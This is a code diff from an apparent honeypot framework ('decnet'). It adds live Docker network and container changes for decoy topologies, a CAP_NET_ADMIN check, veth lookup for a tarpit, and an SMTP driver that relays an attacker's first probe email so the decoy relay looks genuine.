)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live update_decky recreate_base failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
# ------------------------------------------------------------------- ops
|
# ------------------------------------------------------------------- ops
|
||||||
|
|
||||||
|
|
||||||
@@ -131,6 +588,16 @@ async def apply_add_lan(
|
|||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Live materialisation: when the topology is active/degraded, create
|
||||||
|
# the docker bridge network now and re-render the per-topology
|
||||||
|
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||||
|
# services map. Pending topologies skip this — the next deploy
|
||||||
|
# creates everything from scratch. Agent-pinned topologies also
|
||||||
|
# skip; live editing on agents is its own routing problem.
|
||||||
|
await _materialise_lan_change(
|
||||||
|
repo, topology_id, created=(name, subnet, is_dmz),
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -150,7 +617,17 @@ async def apply_remove_lan(
|
|||||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||||
)
|
)
|
||||||
await repo.delete_lan(lan["id"])
|
lan_name = lan["name"]
|
||||||
|
# enforce_pending=False: the mutator queue is the live-editing
|
||||||
|
# surface, gated on topology status by us before we got here. The
|
||||||
|
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||||
|
# bypass it.
|
||||||
|
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||||
|
|
||||||
|
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||||
|
# docker bridge and re-render compose so a future redeploy doesn't
|
||||||
|
# try to wire deckies into a network that no longer exists.
|
||||||
|
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -204,11 +681,12 @@ async def apply_add_decky(
|
|||||||
if forwards_l3:
|
if forwards_l3:
|
||||||
decky_config["forwards_l3"] = True
|
decky_config["forwards_l3"] = True
|
||||||
|
|
||||||
|
services_list = list(payload.get("services", []))
|
||||||
decky_uuid = await repo.add_topology_decky(
|
decky_uuid = await repo.add_topology_decky(
|
||||||
{
|
{
|
||||||
"topology_id": topology_id,
|
"topology_id": topology_id,
|
||||||
"name": name,
|
"name": name,
|
||||||
"services": list(payload.get("services", [])),
|
"services": services_list,
|
||||||
"decky_config": decky_config,
|
"decky_config": decky_config,
|
||||||
"x": payload.get("x"),
|
"x": payload.get("x"),
|
||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
@@ -223,6 +701,25 @@ async def apply_add_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: spawn the new decky's containers without
|
||||||
|
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||||
|
# see _live_topology_or_none.
|
||||||
|
spawned = await _materialise_decky_spawn(
|
||||||
|
repo, topology_id, name, services_list,
|
||||||
|
)
|
||||||
|
# Flip the row's state to 'running' on success so the dashboard's
|
||||||
|
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||||
|
# stays at the default 'pending' forever; the deployer's full
|
||||||
|
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||||
|
if spawned:
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live add_decky: state flip to running failed "
|
||||||
|
"topology=%s decky=%s: %s",
|
||||||
|
topology_id, name, exc,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -286,6 +783,16 @@ async def apply_attach_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: SDK network.connect on the base container.
|
||||||
|
# Service containers share the base's netns via network_mode:
|
||||||
|
# service:<base>, so they inherit the new interface — only the base
|
||||||
|
# needs the connect.
|
||||||
|
await _materialise_decky_connect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
ipv4_address=ip,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -329,7 +836,15 @@ async def apply_detach_decky(
|
|||||||
await repo.update_topology_decky(
|
await repo.update_topology_decky(
|
||||||
decky["uuid"], {"decky_config": new_cfg}
|
decky["uuid"], {"decky_config": new_cfg}
|
||||||
)
|
)
|
||||||
await repo.delete_topology_edge(edge["id"])
|
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||||
|
# Live materialisation: SDK network.disconnect on the base
|
||||||
|
# container. Service containers automatically lose visibility into
|
||||||
|
# the LAN because they share the base's netns.
|
||||||
|
await _materialise_decky_disconnect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -340,7 +855,15 @@ async def apply_remove_decky(
|
|||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
await repo.delete_topology_decky(decky["uuid"])
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
services_list = list(decky.get("services") or [])
|
||||||
|
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||||
|
# Live materialisation: stop + rm -f the decky's containers. We
|
||||||
|
# capture decky_name + services BEFORE the delete so the helper
|
||||||
|
# has the targets even though the row is gone.
|
||||||
|
await _materialise_decky_remove(
|
||||||
|
repo, topology_id, decky_name, services_list,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -354,31 +877,136 @@ async def apply_update_decky(
|
|||||||
``patch`` — dict merged into existing ``decky_config``.
|
``patch`` — dict merged into existing ``decky_config``.
|
||||||
``services`` — replacement top-level services list.
|
``services`` — replacement top-level services list.
|
||||||
``x``,``y`` — layout coords.
|
``x``,``y`` — layout coords.
|
||||||
|
``force`` — opt-in for destructive recreates (currently
|
||||||
|
required when ``forwards_l3`` flips on a
|
||||||
|
live topology — see below).
|
||||||
|
|
||||||
|
Live materialisation strategy:
|
||||||
|
|
||||||
|
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||||
|
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||||
|
direct API path (services_live) without coupling.
|
||||||
|
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||||
|
can only apply at container-create time. Requires recreating
|
||||||
|
the base — destructive (kills in-container state, drops active
|
||||||
|
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||||
|
raise ``MutationError`` so a half-thinking operator doesn't
|
||||||
|
stomp a live decky.
|
||||||
|
* **only coords (x/y)** → DB-only. No docker work.
|
||||||
"""
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
|
|
||||||
|
# Capture pre-state so we can compute the diff after the DB write.
|
||||||
|
old_services = list(decky.get("services") or [])
|
||||||
|
old_cfg = decky.get("decky_config") or {}
|
||||||
|
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||||
|
|
||||||
patch: dict[str, Any] = {}
|
patch: dict[str, Any] = {}
|
||||||
|
new_decky_config = old_cfg
|
||||||
if payload.get("patch"):
|
if payload.get("patch"):
|
||||||
merged = dict(decky["decky_config"])
|
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||||
merged.update(payload["patch"])
|
patch["decky_config"] = new_decky_config
|
||||||
patch["decky_config"] = merged
|
new_services = old_services
|
||||||
if "services" in payload:
|
if "services" in payload:
|
||||||
patch["services"] = list(payload["services"])
|
new_services = list(payload["services"])
|
||||||
|
patch["services"] = new_services
|
||||||
for key in ("x", "y"):
|
for key in ("x", "y"):
|
||||||
if key in payload:
|
if key in payload:
|
||||||
patch[key] = payload[key]
|
patch[key] = payload[key]
|
||||||
if not patch:
|
if not patch:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||||
|
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||||
|
|
||||||
|
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||||
|
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||||
|
# the DMZ' — running it on an internal LAN publishes ports the
|
||||||
|
# outside world can't reach and shadows the host's port space.
|
||||||
|
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||||
|
# the generator/attach paths, not by this op, so this check only
|
||||||
|
# fires when the operator explicitly toggles the flag.
|
||||||
|
if forwards_l3_flipped and new_forwards_l3:
|
||||||
|
# Re-derive the home LAN from the edges; same logic as
|
||||||
|
# check_gateway_homed_in_dmz.
|
||||||
|
decky_uuid = decky["uuid"]
|
||||||
|
home_lan_id: Optional[str] = None
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
if home_lan_id is None:
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
home_lan = next(
|
||||||
|
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||||
|
None,
|
||||||
|
)
|
||||||
|
if home_lan is None or not home_lan.get("is_dmz"):
|
||||||
|
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||||
|
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||||
|
"Move the decky to the DMZ first, or pick a different decky."
|
||||||
|
)
|
||||||
|
|
||||||
|
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||||
|
# mutation leaves zero side-effects.
|
||||||
|
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||||
|
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||||
|
raise MutationError(
|
||||||
|
f"forwards_l3 flip on live decky "
|
||||||
|
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||||
|
"this will recreate the base container and drop in-container state"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_topology_decky(decky["uuid"], patch)
|
await repo.update_topology_decky(decky["uuid"], patch)
|
||||||
|
|
||||||
|
# Materialisation — only when the topology is actually live.
|
||||||
|
# _live_topology_or_none was already called above; calling the
|
||||||
|
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||||
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
added = sorted(set(new_services) - set(old_services))
|
||||||
|
removed = sorted(set(old_services) - set(new_services))
|
||||||
|
if added or removed:
|
||||||
|
await _materialise_decky_services_diff(
|
||||||
|
repo, topology_id, decky_name, added, removed,
|
||||||
|
)
|
||||||
|
if forwards_l3_flipped:
|
||||||
|
# force was checked above; reaching here means the operator
|
||||||
|
# opted in. recreate_base re-renders compose first so the
|
||||||
|
# rebuilt base picks up the new `ports:` block.
|
||||||
|
await _materialise_decky_recreate_base(
|
||||||
|
repo, topology_id, decky_name,
|
||||||
|
)
|
||||||
|
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
async def apply_update_lan(
|
async def apply_update_lan(
|
||||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||||
|
|
||||||
|
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||||
|
Live deckies bind to the bridge with IPs allocated from the old
|
||||||
|
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||||
|
flag, which docker can't change on a network with active
|
||||||
|
containers). Reject those mutations on active/degraded topologies
|
||||||
|
rather than rewriting the DB into an incoherent state.
|
||||||
|
|
||||||
|
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||||
|
unconditionally. Renames pass through too — the bridge's docker
|
||||||
|
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||||
|
rename would also need a rebuild — but rename isn't currently a
|
||||||
|
code path on active topologies; if the operator hits it we still
|
||||||
|
write the row and let the next deploy reconcile.
|
||||||
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
lan = _lan_by_name(hydrated, payload["name"])
|
lan = _lan_by_name(hydrated, payload["name"])
|
||||||
if lan is None:
|
if lan is None:
|
||||||
@@ -389,6 +1017,17 @@ async def apply_update_lan(
|
|||||||
fields[key] = payload[key]
|
fields[key] = payload[key]
|
||||||
if not fields:
|
if not fields:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||||
|
if is_live:
|
||||||
|
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||||
|
if hostile:
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||||
|
f"teardown + redeploy required"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_lan(lan["id"], fields)
|
await repo.update_lan(lan["id"], fields)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|||||||
@@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
|||||||
# Host-side macvlan interface (hairpin fix)
|
# Host-side macvlan interface (hairpin fix)
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
def _require_root() -> None:
|
# Linux capability bit positions — see capabilities(7).
|
||||||
if os.geteuid() != 0:
|
_CAP_NET_ADMIN = 12
|
||||||
raise PermissionError(
|
|
||||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
|
||||||
)
|
def _has_cap_net_admin() -> bool:
|
||||||
|
"""True if the current process holds CAP_NET_ADMIN in its effective set.
|
||||||
|
|
||||||
|
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
|
||||||
|
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
|
||||||
|
bit 12 is CAP_NET_ADMIN.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
with open("/proc/self/status", "r") as fh:
|
||||||
|
for line in fh:
|
||||||
|
if line.startswith("CapEff:"):
|
||||||
|
bits = int(line.split()[1], 16)
|
||||||
|
return bool(bits & (1 << _CAP_NET_ADMIN))
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _require_net_admin() -> None:
|
||||||
|
"""Reject early if the process can't run ``ip link add ... macvlan``.
|
||||||
|
|
||||||
|
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
|
||||||
|
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
|
||||||
|
but not necessary. Prefer the cap check so the systemd unit's
|
||||||
|
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
|
||||||
|
whole API to run as root.
|
||||||
|
"""
|
||||||
|
if os.geteuid() == 0 or _has_cap_net_admin():
|
||||||
|
return
|
||||||
|
raise PermissionError(
|
||||||
|
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
|
||||||
|
"Either run as root or grant the cap (systemd: "
|
||||||
|
"AmbientCapabilities=CAP_NET_ADMIN)."
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||||
@@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
host-helper first: the two drivers can share a parent NIC on paper but
|
host-helper first: the two drivers can share a parent NIC on paper but
|
||||||
leaving the opposite helper in place is just cruft after a driver swap.
|
leaving the opposite helper in place is just cruft after a driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||||
dangling on the parent NIC after the driver swap.
|
dangling on the parent NIC after the driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str:
|
|||||||
strict=False,
|
strict=False,
|
||||||
)
|
)
|
||||||
return str(network)
|
return str(network)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Container veth resolution (for tc netem tarpit)
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def get_container_pid(container_name: str) -> int:
|
||||||
|
"""Return the PID of a running container's init process."""
|
||||||
|
client = docker.from_env()
|
||||||
|
try:
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
except docker.errors.NotFound:
|
||||||
|
raise LookupError(f"container {container_name!r} not found")
|
||||||
|
pid = container.attrs["State"]["Pid"]
|
||||||
|
if not pid:
|
||||||
|
raise LookupError(f"container {container_name!r} is not running (PID=0)")
|
||||||
|
return pid
|
||||||
|
|
||||||
|
|
||||||
|
def get_container_veth(container_name: str) -> str:
|
||||||
|
"""Return the host veth interface name paired to container_name's eth0.
|
||||||
|
|
||||||
|
Reads /sys/class/net/eth0/iflink from inside the container to get the
|
||||||
|
peer interface index, then matches it against ``ip link show`` on the host.
|
||||||
|
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
|
||||||
|
"""
|
||||||
|
result = _run(
|
||||||
|
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
|
||||||
|
check=False,
|
||||||
|
)
|
||||||
|
if result.returncode != 0:
|
||||||
|
raise LookupError(
|
||||||
|
f"container {container_name!r} not reachable: {result.stderr.strip()}"
|
||||||
|
)
|
||||||
|
peer_index = result.stdout.strip()
|
||||||
|
links = _run(["ip", "link", "show"])
|
||||||
|
for line in links.stdout.splitlines():
|
||||||
|
if line.startswith(f"{peer_index}:"):
|
||||||
|
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
|
||||||
|
iface = line.split(":")[1].strip().split("@")[0]
|
||||||
|
return iface
|
||||||
|
raise LookupError(
|
||||||
|
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
|
||||||
|
)
|
||||||
|
|||||||
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
"""SMTP probe-relay driver.
|
||||||
|
|
||||||
|
Forwards the attacker's first probe email via the master's real internet
|
||||||
|
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||||
|
the master (where this worker runs) does.
|
||||||
|
|
||||||
|
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import email
|
||||||
|
import smtplib
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||||
|
|
||||||
|
|
||||||
|
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
|
||||||
|
"""Return body with a From: header added if one is absent."""
|
||||||
|
try:
|
||||||
|
msg = email.message_from_bytes(body)
|
||||||
|
except Exception:
|
||||||
|
return body
|
||||||
|
if msg["From"]:
|
||||||
|
return body
|
||||||
|
# Prepend the header before the existing content.
|
||||||
|
header_line = f"From: {mail_from}\r\n".encode()
|
||||||
|
return header_line + body
|
||||||
|
|
||||||
|
|
||||||
|
def forward_probe(
|
||||||
|
*,
|
||||||
|
svc_cfg: dict[str, Any],
|
||||||
|
stored_as: str,
|
||||||
|
decky_name: str,
|
||||||
|
mail_from: str,
|
||||||
|
rcpt_to: list[str],
|
||||||
|
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
|
||||||
|
) -> tuple[bool, str]:
|
||||||
|
"""Read the .eml from disk and forward it via the upstream relay.
|
||||||
|
|
||||||
|
Returns (True, "") on success or (False, reason) on failure.
|
||||||
|
Always safe to call in a thread — uses only blocking I/O.
|
||||||
|
"""
|
||||||
|
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
|
||||||
|
if not upstream_host:
|
||||||
|
return False, "upstream_host not configured"
|
||||||
|
|
||||||
|
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
|
||||||
|
try:
|
||||||
|
body = eml_path.read_bytes()
|
||||||
|
except OSError as exc:
|
||||||
|
return False, f"cannot read eml: {exc}"
|
||||||
|
|
||||||
|
if not rcpt_to:
|
||||||
|
return False, "no recipients"
|
||||||
|
|
||||||
|
upstream_port = int(svc_cfg.get("upstream_port") or 25)
|
||||||
|
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
|
||||||
|
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
|
||||||
|
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
|
||||||
|
|
||||||
|
# Ensure the message has a From: header so mail clients show the attacker's
|
||||||
|
# address rather than falling back to the envelope sender (upstream_sender).
|
||||||
|
# Minimal relay-test scripts often omit headers entirely.
|
||||||
|
body = _ensure_from_header(body, mail_from)
|
||||||
|
|
||||||
|
try:
|
||||||
|
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
|
||||||
|
conn.ehlo()
|
||||||
|
if conn.has_extn("STARTTLS"):
|
||||||
|
conn.starttls()
|
||||||
|
conn.ehlo()
|
||||||
|
if upstream_user and upstream_pass:
|
||||||
|
conn.login(upstream_user, upstream_pass)
|
||||||
|
conn.sendmail(envelope_from, rcpt_to, body)
|
||||||
|
return True, ""
|
||||||
|
except Exception as exc:
|
||||||
|
return False, str(exc)[:256]
|
||||||
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
import shlex
|
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
from datetime import datetime
|
||||||
import base64
|
|
||||||
from datetime import datetime, timezone
|
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||||
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
|
|||||||
) -> ActivityResult:
|
) -> ActivityResult:
|
||||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||||
|
|
||||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||||
it doesn't all stamp at wall-clock-now (the realism failure
|
backdate the file (otherwise everything stamps at wall-clock-now
|
||||||
this migration is fixing).
|
— the realism failure this path was originally fixing).
|
||||||
"""
|
"""
|
||||||
|
from decnet.decky_io import write_file_to_container
|
||||||
|
|
||||||
container = _container_for(decky_name)
|
container = _container_for(decky_name)
|
||||||
b64 = base64.b64encode(content).decode("ascii")
|
success, error = await write_file_to_container(
|
||||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||||
# container's local TZ doesn't drift the mtime.
|
|
||||||
if mtime is not None:
|
|
||||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
|
||||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
|
||||||
else:
|
|
||||||
touch_cmd = f"touch {shlex.quote(path)}"
|
|
||||||
sh_cmd = (
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
|
||||||
f"base64 -d > {shlex.quote(path)} && "
|
|
||||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
|
||||||
f"{touch_cmd}"
|
|
||||||
)
|
)
|
||||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
|
||||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
|
||||||
success = rc == 0
|
|
||||||
payload: dict[str, Any] = {
|
payload: dict[str, Any] = {
|
||||||
"dst_decky": decky_name,
|
"dst_decky": decky_name,
|
||||||
"path": path,
|
"path": path,
|
||||||
"bytes": len(content),
|
"bytes": len(content),
|
||||||
"rc": rc,
|
"rc": 0 if success else 1,
|
||||||
"stderr": stderr.strip()[:256] if not success else None,
|
"stderr": error if not success else None,
|
||||||
}
|
}
|
||||||
return ActivityResult(success=success, payload=payload)
|
return ActivityResult(success=success, payload=payload)
|
||||||
|
|
||||||
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
|
||||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
|
||||||
host to share the destination container's separator semantics, but
|
|
||||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
|
||||||
idx = path.rfind("/")
|
|
||||||
if idx <= 0:
|
|
||||||
return "/"
|
|
||||||
return path[:idx]
|
|
||||||
|
|||||||
@@ -175,7 +175,7 @@ async def pick(
|
|||||||
)
|
)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||||
if len(active) < 2:
|
if len(active) < 2:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
